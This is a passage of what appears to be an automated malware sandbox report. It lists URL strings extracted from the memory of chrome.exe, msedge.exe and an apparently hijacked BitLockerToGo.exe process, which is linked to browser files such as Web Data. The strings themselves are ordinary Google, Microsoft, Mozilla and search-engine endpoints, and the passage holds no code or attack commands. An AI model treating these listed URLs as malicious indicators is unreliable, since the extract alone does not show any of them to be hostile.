                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                          Source: chrome.exe, 00000007.00000003.2114645411.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116267973.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2126794662.00002FC000CB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2116897074.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109108414.00002FC000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109131079.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2110583766.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109177552.00002FC000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2112515732.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109739044.00002FC000DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                          Source: chrome.exe, 00000007.00000003.2154140903.00002FC00264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                          Source: msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.13.drString found in binary or memory: https://chromewebstore.google.com/
                          Source: msedge.exe, 0000000B.00000002.2320993363.00006FE80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/https://chrome.google.com/webstoreo
                          Source: chrome.exe, 00000007.00000003.2082554947.00005D8C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2082601562.00005D8C002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2319013598.00006FE800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                          Source: chrome.exe, 00000007.00000003.2115191569.00002FC000F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: chrome.exe, 00000007.00000003.2157656759.00002FC001698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://docs.google.com/
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-autopush.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-preprod.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive-staging.corp.google.com/
                          Source: chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                          Source: chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drString found in binary or memory: https://drive.google.com/
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
